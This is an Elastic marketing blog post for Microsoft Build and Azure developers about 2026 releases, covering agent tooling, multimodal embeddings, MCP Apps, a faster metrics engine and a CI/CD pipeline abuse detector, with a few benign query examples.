Skip to main content

New

Forrester Wave Leader, Q2 2025

Access report
About usPartnersSupport|Login
Elastic logo
Start free trialContact sales

The essential Elastic 2026 wrap-up for Microsoft Build attendees and Azure developers

AI agents that remember. 30x faster than Prometheus. One index for all media. Here’s what Elastic shipped in 2026.

By
Greg Crist
MS-Build.jpg

So far in 2026 Elastic has shipped four advances that change what your search and what our AI stack can do. 

  • Elastic Inference Service (EIS) now hosts jina-embeddings-v5-omni, which puts text, images, video, and audio in a single Elasticsearch index across nearly 100 languages. 
  • Elastic Agent Builder shipped context management, skills, and enterprise connectors so that AI agents stay accurate across long conversations at scale. 
  • The rebuilt metrics engine stores OpenTelemetry (OTel) data at 3.75 bytes per data point and queries it 160x faster than earlier Elasticsearch TSDS.
  • Elastic Security Labs open-sourced a CI/CD pipeline detector that catches GitHub Actions and Azure DevOps attackers before they reach production.

Catch up with what we’ve shipped in 2026 in this blog.

4 reasons Elastic is the platform for Azure developers in 2026

1. Elasticsearch is now the retrieval layer for agents built on Azure AI Foundry

The single biggest production failure for AI agents is context — wrong data, stale data, or no data at all reaching the agent at inference time. Elastic 9.4 solves this with three production-grade advances to Agent Builder, now generally available:

  1. Skills: Instructional packages are loaded by the agent on demand, giving it domain expertise without bloating every context window. Five purpose-built skills have shipped for security operations, five have shipped for site reliability engineering (SRE) workflows, and more are in development. 

  2. Native Microsoft 365 connectors: SharePoint and Drive content surfaces directly into agent context through a semantic metadata layer. Your enterprise corpus becomes the retrieval backbone; Elasticsearch is the index.

  3. Context management at scale: Query result offloading, compaction, and summarization keep long, multi-turn agent conversations accurate and cost-efficient in production.

GPU-accelerated indexing via NVIDIA cuVS — generally available in Elastic 9.4 — delivers a 12x improvement in indexing throughput. DiskBBQ, Elastic's vector indexing algorithm, has improved query latency by at least 3x for queries with restrictive filters. For AI workloads running on Azure with high-cardinality embeddings, this is the infrastructure advantage that shows up in latency and cost at scale.

The Microsoft Azure AI integration is a first-class citizen in the Elasticsearch Labs ecosystem. If you are using Azure OpenAI Service or Azure AI Foundry models, Elasticsearch is ready as the retrieval backbone with hybrid search (BM25 + vector), reranking, and context engineering built in.

For TypeScript and JavaScript developers in the Azure ecosystem, Elastic also shipped a fluent, type-safe Elasticsearch Query Language (ES|QL) query builder in April 2026. No more raw string interpolation for queries. No more runtime surprises from typos in field names:

const query = esql
  .from('logs-*')
  .where('event.category', '==', 'authentication')
  .stats('count(*)', { by: ['user.name', 'host.name'] })
  .sort('count(*)', 'desc')
  .limit(10);

One index for every media type your agent touches
Microsoft 365 content is not only text. SharePoint libraries hold PDFs, slide decks, and scanned images. Teams capture meeting recordings. Azure Blob Storage holds product photography, training videos, and audio files from customer calls. Until now, indexing each type required a separate model and a separate pipeline.

jina-embeddings-v5-omni is hosted on Elastic Inference Service and puts text, images, video, and audio in a single Elasticsearch index. One query retrieves semantically relevant content across every media type simultaneously, covering nearly 100 languages. The model is available in two sizes, small and nano; both are optimized for standard GPU hardware.

For developers with existing text indices, jina-embeddings-v5-omni generates text embeddings identical to jina-embeddings-v5-text. You can extend a text index to handle images, audio, and video without rebuilding it. With Elasticsearch BBQ quantization enabled, the model loses less than 3% performance while storing embeddings in 93% less space.

Note: jina-embeddings-v5-omni is available for non-commercial evaluation on a CC-BY-NC-4.0 license. Contact Elastic Sales for commercial deployment.

2. Elastic is now inside VS Code, Cursor, and GitHub Copilot

In April 2026, Elastic shipped MCP Apps — interactive UIs rendered inside an AI conversation and built on the MCP App standard, coauthored by Anthropic and OpenAI. Three MCP Apps launched simultaneously: security, observability, and search. All three work natively inside VS Code Copilot, Cursor, and Claude Desktop.

The Elastic Security MCP App delivers six interactive security operations center (SOC) dashboards rendered inline in the chat without leaving the coding environment:

  1. Interactive UI: Alert Triage: Fetch, filter, and classify security alerts. Severity grouping, AI verdict cards, process tree, and network events.

  2. Attack Discovery: AI-correlated attack chain analysis with on-demand generation. Attack narrative cards with confidence scoring, entity risk, and MITRE mapping.

  3. Case management: Create, search, and manage investigation cases. Case list with alerts, observables, comments tabs, and AI actions.

  4. Detection rules: Browse, tune, and manage detection rules. Rule browser with KQL search, query validation, and noisy-rule analysis.

  5. Threat hunt: ES|QL workbench with entity investigation. Query editor, clickable entities, and investigation graph.

  6. Sample data: Generate ECS security events for common attack scenarios. Scenario picker with four prebuilt attack chains.

Every action writes back to Elasticsearch and Kibana through the same APIs the product uses. Role-based access controls are enforced through the existing Elasticsearch API key. Setup is a single .mcpb bundle double-click. No new infrastructure. No new governance model.

The Kubernetes Observability MCP App brings AKS investigation skills directly into VS Code. When a pod crashes, the AI coding agent can query root cause, surface structured evidence, and recommend next steps without opening a dashboard.

Install both bundles from the latest GitHub release.

3. Elasticsearch is now a production-grade columnar metrics engine

Azure is all-in on OpenTelemetry. Azure Monitor, AKS, Azure Functions, and Azure AI Foundry all emit OpenTelemetry protocol (OTLP) data natively. If you are already collecting OTel telemetry from your Azure workloads, the question is where it lands and how fast you can query it when something breaks at 2:00 a.m.

Elastic rebuilt Elasticsearch's metrics engine from the ground up in 2026, and the results are significant. The new columnar metrics engine stores OTel metrics at 3.75 bytes per data point — down from 25 bytes a year ago, a 6.6x improvement in storage efficiency. Query performance improved by up to 160x compared to earlier versions of Elasticsearch TSDS. Indexing throughput for OTel data improved by up to 50%.

The architectural work behind these numbers involved three layers:

  1. Fully columnar storage: Elastic replaced inverted indices and BKD trees on dimension fields with doc value skippers, a Lucene-native structure that amplifies the columnar layout and eliminates duplicate index overhead. Each field is stored in its own file. No row-level tracking. No storage bloat.

  2. Vectorized ES|QL compute engine: The new TS source command, generally available in Elastic 9.4, executes time series aggregations using a two-level model: an inner aggregation per time series, such as RATE() or AVG_OVER_TIME(), and then an outer aggregation over the results. The compute engine processes data in time series sort order with zero-copy decoding directly into the primitive arrays it operates on. Counter rate, gauge average, and windowed queries all run with parallel vectorized execution.

  3. Native OTLP ingestion: A dedicated OTLP protobuf endpoint, generally available in Elastic 9.3, accepts data directly from OpenTelemetry collectors with no JSON translation layer. Hashing over dimensions for time series ID calculations is amortized across data points in a single protobuf message, reducing indexing overhead by 20%.

For Azure AKS teams with existing PromQL-based dashboards and alert rules, Elastic 9.4 ships native PromQL support (technical preview) in Kibana. Existing queries work without modification. The same TSDS storage and vectorized compute engine power both PromQL and ES|QL queries side by side.

The result is a single platform for logs, metrics, traces, and security data with no separate backends to operate, no cardinality limits, and no per-metric pricing. For Azure developers who are already emitting OTel data, landing it in Elasticsearch costs less to store and queries faster than running a dedicated metrics stack alongside your existing log infrastructure.

A sample ES|QL time series query for Azure AKS workloads:

TS metrics-hostmetricsreceiver.otel-default
| WHERE TRANGE(4h)
| STATS AVG(RATE(system.cpu.time)) BY host.name, TBUCKET(5m)

4. Elastic now secures the apps you build, including the pipeline that deploys them

CI/CD pipelines are a top attack target in 2026, and they target Azure and GitHub developers directly.

Elastic Security Labs published research in April 2026 on a pattern that played out across the industry: Attackers stopped going after production servers and started targeting the automation that deploys to them. In September 2025, the GhostAction campaign stole 3,325 secrets from 817 GitHub repositories by injecting malicious workflow files. In February 2026, HackerBot-Claw compromised Aqua Security's Trivy repository, exposing 33,000 secrets across 7,000 machines via a GitHub Actions misconfiguration that Microsoft's own security team subsequently documented.

Elastic Security Labs open-sourced cicd-abuse-detector — a drop-in CI template using 50+ signal extraction patterns plus large language model (LLM) reasoning to detect suspicious changes to GitHub Actions, GitLab CI, and Azure DevOps pipelines. It runs on a standard ubuntu-latest runner with no Python dependencies. Verdicts ship to Elasticsearch for cross-platform correlation:

FROM logs-cicd.abuse-* 
WHERE verdict.verdict IN ("malicious", "suspicious") AND @timestamp > NOW() - 7 days
| EVAL platform = cicd.platform, repo = cicd.repository, actor = cicd.actor
| SORT @timestamp DESC

One query. Every platform. Historically queryable.

For Entra ID and Active Directory environments, Elastic Security 9.4 ships four new Entity Analytics capabilities that resolve identity noise at the data model level:

  1. Entity resolution: Unifies Okta, Microsoft Entra ID, and Active Directory into one verified identity record per employee (When a threat actor moves laterally using the same identity across three systems, Elastic sees it as one entity, not three separate alerts.)

  2. Dynamic watchlists: Injects risk multipliers for Azure privileged admins, executives, and crown-jewel service accounts

  3. Entity-driven hunting leads: Surfaces proactive, environment-specific threat hunting leads rather than a blank hunt query

  4. Precision entity identification: Governs identity unification automatically at the platform level

For Azure AI Foundry and LLM applications, the Azure AI Foundry integration, shipped in Elastic 9.1, centralizes observability by pulling logs and metrics from any AI model hosted on Azure AI Foundry into Elasticsearch automatically. From there, Elastic Observability delivers full distributed tracing across agent chains, token cost tracking, latency monitoring, and safety evaluation, so you can see exactly what your agent did, what it cost, and where it broke.

For GitHub Actions and Azure DevOps users managing Kibana, Elastic 9.4 ships Dashboards as Code — version-controlled Kibana dashboards deployed through CI/CD pipelines. Dashboards live in source control alongside your application code. Pull requests, review gates, and automated rollouts apply to your observability and security views the same way they apply to the services those views monitor.

Compliance: FIPS 140-3 compliance for Elasticsearch and Kibana is generally available in Elastic 9.4, ahead of the September 2026 deadline. Elastic Cloud Serverless is live in nine Azure regions worldwide and will continue Azure regional expansion in the coming months.

Start here: 4 actions for Microsoft Build attendees

  1. Wire Elasticsearch into your Azure AI Foundry agent today. Start a free Elastic Cloud trial. Navigate to the Microsoft Azure AI integration. Connect your first Azure OpenAI-backed agent to Elasticsearch as the retrieval layer. A working prototype takes under an hour.
  2. Install the Elastic MCP Apps in VS Code. Download the .mcpb bundle from the latest release. Connect it in VS Code Copilot using your Elasticsearch URL and API key. Your first security triage or Kubernetes investigation runs inside the chat in five minutes.
  3. Land your Azure OTel metrics in Elasticsearch. Enable the managed OTLP endpoint on Elastic Cloud. Point your Azure Monitor OTel collector at it. Query your AKS metrics, host telemetry, and application traces in a single ES|QL pipeline — no separate metrics backend required.
  4. Harden your GitHub Actions and Azure DevOps pipelines. Clone the cicd-abuse-detector repo. Add it to your next pull request check. Review the full threat model against your pipeline configuration. The entire setup runs on your existing runner with no dependencies beyond the Claude Code CLI.

The Elasticsearch Platform in 2026 was built for developers who work in the Microsoft and Azure ecosystem. Agents, metrics, pipelines, and identity all converge here. Build with us.

The release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.

Sign up for Elastic Cloud free trial

Spin up a fully loaded deployment on the cloud provider you choose. As the company behind Elasticsearch, we bring our features and support to your Elastic clusters in the cloud.

Start free trial